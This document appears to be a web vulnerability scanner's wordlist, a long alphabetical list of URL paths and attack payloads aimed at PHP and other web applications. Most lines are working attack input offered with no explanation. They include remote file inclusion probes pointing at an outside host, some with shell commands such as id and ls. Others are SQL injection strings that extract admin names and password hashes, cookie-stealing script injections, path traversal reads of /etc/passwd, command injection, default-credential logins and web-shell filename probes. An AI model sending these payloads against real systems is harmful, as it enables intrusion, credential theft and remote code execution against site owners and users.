phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://www.yxlink.com/nvs_test.txt?
phpAdsNew/view.inc.php?phpAds_path=http://www.yxlink.com/nvs_test.txt
phpBB/phpinfo.php
phpBB/viewtopic.php?t=17071&highlight=\x5C\x22>\x5C\x22<script>javascript:alert(document.cookie)</script>
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
phpBB2/includes/db.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
phpBB2/search.php?search_id=1\x5C\x5C
phpBB2/shoutbox.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
phpCards.header.php?CardPath=http://www.yxlink.com/nvs_test.txt?
phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.yxlink.com/nvs_test.txt
phpMyAdmin
phpMyAdmin/
phpMyAdmin/index.php
phpMyAdmin/main.php
phpMyAdmin/scripts/setup.php?>'\x22><script>alert('xss')</script>
phpMyAdmin/sql.php?btnDrop=No&goto=/etc/passwd
phpMyAdmin0
phpMyAdmin1
phpMyAdmin2/
phpMyAdmin2/main.php
phpMyChat.php3?=http://www.yxlink.com/nvs_test.txt?cmd=id
phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=http://www.yxlink.com/nvs_test.txt?
phpPgAdmin
phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=http://www.yxlink.com/nvs_test.txt?
phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
phpThumb
phpThumb.php
phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
phpbb/sendmsg.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
phpcalendar/includes/calendar.php?phpc_root_path=http://www.yxlink.com/nvs_test.txt?
phpcalendar/includes/setup.php?phpc_root_path=http://www.yxlink.com/nvs_test.txt?
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
phpcms/yp/product.php?pagesize=${@print(md5(NVS_TEST))}
phpdebug_PATH/test/debug_test.php?debugClassLocation=http://www.yxlink.com/nvs_test.txt
phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.yxlink.com/nvs_test.txt
phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.yxlink.com/nvs_test.txt
phphd_downloads/common.php?phphd_real_path=http://www.yxlink.com/nvs_test.txt
phphost_directoryv2/include/admin.php?rd=http://www.yxlink.com/nvs_test.txt?
phphtml.php?htmlclass_path=http://www.yxlink.com/nvs_test.txt
phpi/edit_top_feature.php?include_connection=http://www.yxlink.com/nvs_test.txt
phpi/edit_topics_feature.php?include_connection=http://www.yxlink.com/nvs_test.txt
phpimageview.php?pic=javascript:alert('Vulnerable')
phpinfo.php
phpinfo.php3
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php5
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(111)</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
phpinj.php
phpldapadmin
phplib/site_conf.php?ordnertiefe=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/referenz.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/standard/1/lay.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/standard/3/lay.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplinks/includes/smarty.php?full_path_to_public_program=http://www.yxlink.com/nvs_test.txt
phpliteadmin.php
phpliteadmin.php?action=row_view&table=\xE2\x80\x98
phpmm.php
phpmyadmin
phpmyadmin/index.php
phpmyadmin/main.php
phpmyadmin0
phpmyadmin1
phpmyadmin2/
phpmyadmin2/main.php
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phporacleview/inc/include_all.inc.php?page_dir=http://www.yxlink.com/nvs_test.txt
phppc/poll.php?is_phppc_included=1&relativer_pfad=http://www.yxlink.com/nvs_test.txt?
phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://www.yxlink.com/nvs_test.txt?
phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=http://www.yxlink.com/nvs_test.txt?
phppgadmin
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\x5C\x5C
phpquickgallery/gallery_top.inc.php?textFile=http://www.yxlink.com/nvs_test.txt
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phpreactor/inc/polls.inc.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
phpreactor/inc/updatecms.inc.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
phpreactor/inc/users.inc.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
phpreactor/inc/view.inc.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
phpress/adisplay.php?lang=http://www.yxlink.com/nvs_test.txt
phprint.php?module=--><script>alert(/xss/)</script>&action=index&parenttab=My%20Home%20Page&jt=
phpspy.php
phpsso_server/api.php?op=uc
phpsysinfo
phptonuke.php?filnavn=/etc/passwd
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
phpunit.xml
phpunity-postcard.php?plgallery_epost=1&gallery_path=http://www.yxlink.com/nvs_test.txt?
phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.yxlink.com/nvs_test.txt
phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.yxlink.com/nvs_test.txt
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>&email1=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\x5C\x22><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\x5C\x22><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\x5C\x22><script>alert('Vulnerable')</script>&MMN_position=[X:X]
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\x5C\x22><script>alert('Vulnerable')</script>
phpyabs/moduli/libri/index.php?Azione=http://www.yxlink.com/nvs_test.txt
pi.php
pi.php5
pic.php
pic.php?url=MWpwZy8uLi9jb3JlL2NvbmZpZy5jb25uLnBocA==&type=jpg
pics
pictures
pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://www.yxlink.com/nvs_test.txt
piw/Production/display/productSearch.jsp?keywords=1%27)/**/AND/**/(select/**/2301/**/from(select/**/count(*),concat(0x7c,(mid((ifnull(cast(current_user()/**/as/**/char),0x20)),1,50)),0x7c,md5(1),0x7c,floor(rand(0)*2))x/**/from/**/information_schema.character_sets/**/group/**/by/**/x)a)/**/and/**/(%27a%27=%27a)
piwik/libs/open-flash-chart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
piwik/libs/open-flash-chart/php-ofc-library/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
planetGalleryPath/images/1/evil.png.php
player
player.swf
playlist.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
pls/admin
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
pls/help/<script>alert('Vulnerable')</script>
pls/ldc/admin_/
pls/portal30/admin_/
pls/sample/admin_/help/..%255cplsql.conf
pls/simpledad/admin_/
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
pls/simpledad/admin_/dadentries.htm
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
plug/productbuy.asp?id=-2+union+select+1,2,888888-1,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User
plugin/HP_DEV/cms2.php?s_dir=http://www.yxlink.com/nvs_test.txt
plugin/gateway/gnokii/init.php?apps_path[plug]=http://www.yxlink.com/nvs_test.txt?
plugins
plugins/
plugins/1_Adressbuch/delete.php?folder=http://www.yxlink.com/nvs_test.txt
plugins/BackUp/Archive.php?bkpwp_plugin_path=http://www.yxlink.com/nvs_test.txt?
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://www.yxlink.com/nvs_test.txt?
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.yxlink.com/nvs_test.txt?
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.yxlink.com/nvs_test.txt?
plugins/editors/fckeditor
plugins/fckeditor
plugins/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(md5(333),0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
plugins/links/functions.inc?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/polls/functions.inc?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/rss_importer_functions.php?sitepath=http://www.yxlink.com/nvs_test.txt?
plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.yxlink.com/nvs_test.txt?
plugins/safehtml/safehtml.php?dir[plugins]=http://www.yxlink.com/nvs_test.txt?
plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf//swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf//swfupload_f8.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf//swfupload_f9.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/Import.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/staticpages/functions.inc?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/tiny_mce
plugins/tinymce
plugins/vkeyboard/vkeyboard.php?passformname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E%3Cscript%3E/*%20
plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.yxlink.com/nvs_test.txt
plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=http://www.yxlink.com/nvs_test.txt
plupload
plus.php?_pages_dir=http://www.yxlink.com/nvs_test.txt?
plus/Ajaxs.asp?action=GetRelativeItem&Key=%25
plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527NVS_TEST%2527%252Bpassword%20from%20KS_Admin%2500
plus/advancedsearch.php?mid=1&sql=SELECT
plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash,md5(333)%29,3+from+qs_admin%23
plus/ajax_officebuilding.php?act=alphabet&x=11%d5'%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9%20from%20qs_admin%23
plus/ajax_street.php?act=alphabet&x=11%d5'%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9%20from%20qs_admin%23
plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,user(),5,6,7,md5(333),9%23
plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=52&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=110&arrs2[]=118&arrs2[]=115&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=100&arrs2[]=53&arrs2[]=40&arrs2[]=51&arrs2[]=51&arrs2[]=51&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
plus/en_search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
plus/feedback_js.php?arcurl=%27
plus/fr_search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
plus/list.php?tid=6&TotalResult=%3Ciframe%20src=http://www.baidu.com%3E&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2
plus/mytag_js.php?aid=9014
plus/nvs.php
plus/outside.php?id=../robots.txt%00
plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\x5C%27%20or%20mid=@`\x5C%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,md5(333),0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\x5C%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
plus/recommend.php?aid=1&action=sendmail&title=<script>alert(123)</script>
plus/search.php?keyword=as&typeArr[111%3D@%60\x5C%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,md5(333),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\x5C%27%60+]=a
plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.baidu.com%3E&PageNo=2
plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.yxlink.com/nvs_test.txt
pm/lib.inc.php?pm_path=http://www.yxlink.com/nvs_test.txt
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
pma
pma/
pma/index.php
pma/main.php
pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http://www.yxlink.com/nvs_test.txt?
pmd_pdf.php?db=>\x22><script>alert(3333)</script>
pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.yxlink.com/nvs_test.txt
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/login.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/archive_cat.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
podcastgen1.0beta2/core/recent_list.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
poll/poll.php?SITE_Path=http://www.yxlink.com/nvs_test.txt
poll/view.php?int_path=http://www.yxlink.com/nvs_test.txt
poll/view_polls.php?SITE_Path=http://www.yxlink.com/nvs_test.txt
pollit/Poll_It_SSI_v2.0.cgi?data_dir=\x5Cetc\x5Cpasswd%00
polls.php?action=newpoll&tid=1&polloptions='
pollvote.php?pollname=http://www.yxlink.com/nvs_test.txt?&cmd=ls
pom.xml
pop.php?base=http://www.yxlink.com/nvs_test.txt
popup_window.php?site_isp_root=http://www.yxlink.com/nvs_test.txt
port.php?content=http://www.yxlink.com/nvs_test.txt
portal
portal/includes/portal_block.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&df_next_page=htdocs/forums.jsp&RowKeyValue=<script>alert(1111</script>
portal/portal.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
portfolio.php?id=http://www.yxlink.com/nvs_test.txt
portfolio/commentaires/derniers_commentaires.php?rep=http://www.yxlink.com/nvs_test.txt?
post.php?fid=10\x22><script>alert(111)</script>
post.php?fid=10\x22><script>alert(222);</script>
post_static_0-11/_lib/fckeditor/upload_config.php?DDS=http://www.yxlink.com/nvs_test.txt
postinfo.html
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\x5C\x22%3<script>alert('Vulnerable')</script>
prepare.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
prepend.php?_PX_config[manager_path]=http://www.yxlink.com/nvs_test.txt
preview.php?php_script_path=http://www.yxlink.com/nvs_test.txt?&cmd=dir
principal.php?conteudo=http://www.yxlink.com/nvs_test.txt
print.php?page=http://www.yxlink.com/nvs_test.txt
print.php?pager=http://www.yxlink.com/nvs_test.txt
print.php?print=http://www.yxlink.com/nvs_test.txt?
printenv
printenv.tmp
printview.php?t={existing_topic's_id}&order_sql=UNION%20SELECT%201%20,%20md5(333)%20,%201,%201,%201,%201,%201,%201,%201,%201,%201,%201%20FROM%20{phpbb_users_table}%20WHERE%20user_id%20={some_user's_id}%20ORDER%20BY%20t.topic_id%20ASC
private
private.key
private.mdb
private.php?acuparam=>\x22><ScRiPt>alert(2222)</ScRiPt>
private.sqlite
privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND20%pm.privmsgs_type=-9920%UNION20%SELECT20%0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,md5(333)20%FROM20%phpbb_users20%WHERE20%user_id=220%LIMIT20%1/*
process.php?DEFAULT_SKIN=http://www.yxlink.com/nvs_test.txt
product/class/?1'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/*.html
products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,md5(333),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
professeurs/index.php?repertoire_config=http://www.yxlink.com/nvs_test.txt
profil.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
profile
profile.php?action=forumright\x22><script>alert(111);</script>
profile.php?action=forumright\x22><script>alert(111)</script>
profile.php?acuparam=>\x22><ScRiPt>alert(2222)</ScRiPt>
profile.php?mode=viewprofile&u='
profile.php?u=JUNK(8)
profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
profiles/html/simpleSearch.do?name=<IMG%20SRC=\x22vbscript:msgbox(document.cookie)'>&lang=en
project.xml
projects
projects/weatimages/demo/index.php?ini[langpack]=http://www.yxlink.com/nvs_test.txt
promocms/newspublish/include.php?path[bdocroot]=http://www.yxlink.com/nvs_test.txt
propel.ini
protection.php?logout_page=http://www.yxlink.com/nvs_test.txt?
provider/auth.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
proxy/smhui/getuiinfo?JS&servercert=%0064e43<script>alert(1)</script>7b3f58a689f
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
prv
psynch/nph-psa.exe?css=http://www.yxlink.com/nvs_test.txt
psynch/nph-psf.exe?css=http://www.yxlink.com/nvs_test.txt
public/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=http://www.yxlink.com/nvs_test.txt?
public_html/lists/admin/?num=\x22><script>alert(222)</script>&option=bounces&page=reconcileusers
public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://www.yxlink.com/nvs_test.txt?
public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.yxlink.com/nvs_test.txt
public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://www.yxlink.com/nvs_test.txt
publication_list.xml
publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
pwciasservices/Staging/CitiPayPro.nsf/Footer?OpenForm&BaseTarget=\x22;+alert(111);+var+mit=\x22a
pwciasservices/Staging/CitiPayPro.nsf/SubPayrollExceptionsFS?OpenFrameSet&Frame=Main&Src=a\x22></FRAMESET><script>alert(111)</script>
pwnshell.php
pws.php
q
q.php
qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=http://www.yxlink.com/nvs_test.txt?
qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=http://www.yxlink.com/nvs_test.txt?
qte_web.php?qte_web_path=http://www.yxlink.com/nvs_test.txt?
query?mss=%2e%2e/config
quick_reply.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt&mode=[file]
quickie.php?QUICK_PATH=http://www.yxlink.com/nvs_test.txt?&cmd=id
r
r.php
r00t.php
r3za.php
r57.php
r57eng.php
r57shell.php
r58.php
railo-context/admin/update.cfm?ADMINTYPE=admin<svg/onload=alert(1)>
random2.php?path_to_folder=http://www.yxlink.com/nvs_test.txt
randshop/index.php?incl=http://www.yxlink.com/nvs_test.txt?
rdf.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
reactivate.php?base_dir=http://www.yxlink.com/nvs_test.txt
read.me
read.php?data=http://www.yxlink.com/nvs_test.txt? 
read.php?nowtime=\x22><script>alert(111)</script>
read.php?nowtime=\x22><script>alert(222);</script>
readme
readme.html
readme.md
readme.txt
readmore.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
recaptcha
recent.php?insPath=http://www.yxlink.com/nvs_test.txt
recentservers.xml
rechnung.php?_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt
rechnung.php?_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt?
reconfig.php?GLOBALS[CLPath]=http://www.yxlink.com/nvs_test.txt
redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.yxlink.com/nvs_test.txt
redaxo_path/include/addons/version/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.yxlink.com/nvs_test.txt
redaxo_path/include/pages/specials.inc.php?subpage=lang&REX[INCLUDE_PATH]=http://www.yxlink.com/nvs_test.txt
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
redirect.php?url=http://www.yxlink.com/nvs_test.txt
